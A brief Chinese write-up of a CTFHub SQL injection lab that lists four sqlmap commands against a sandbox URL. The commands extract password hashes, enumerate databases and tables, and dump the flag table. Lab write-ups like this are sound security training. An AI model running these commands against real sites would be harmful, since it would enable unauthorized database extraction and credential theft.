题目:
图1. 题目截图
参考网站:
主要的解题点:
- 根据以往的知识,分析可以采用union的形式;
- 但是还是要善用工具,使用sqlmap可以一步到位
这里列明一些其中的关键步骤:
其实本题只要按照sqlmap官网上给出的demo操作即可
-
Step1:
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --password
图1. 破译密码
-
Step2:
python sqlmap.py -u "http://challenge5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dbs
图2. databases情况
-
Step3:
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli
图3. tables情况
-
Step4:
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli
图4. 拖库
网友评论